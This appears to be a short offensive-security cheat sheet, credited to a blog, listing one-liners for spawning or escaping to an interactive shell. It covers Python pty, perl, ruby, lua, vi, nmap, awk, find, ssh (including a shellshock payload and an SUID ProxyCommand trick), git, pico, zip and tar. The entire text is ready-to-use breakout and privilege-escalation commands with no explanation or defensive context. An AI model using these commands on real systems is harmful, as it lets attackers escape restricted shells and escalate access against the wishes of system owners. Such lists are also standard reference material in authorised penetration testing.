python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
From within IRB
exec "/bin/sh"
From within vi
:!bash
:set shell=/bin/bash
:shell
From within nmap
!sh
From scp:
scp -S /path/yourscript x y:
AWK:
awk 'BEGIN {system("/bin/sh or /bin/bash")}'
find:
find / -name test -exec /bin/sh or /bin/bash \;
ssh:
ssh username@IP -t "/bin/sh" or "/bin/bash"
ssh username@IP -t "bash --noprofile"
ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
git: from within the help pager, enter !/bin/bash to get an interactive shell
pico -s "/bin/bash": in the editor, type /bin/bash and then press Ctrl+T
zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
Source: lsh4ck's Blog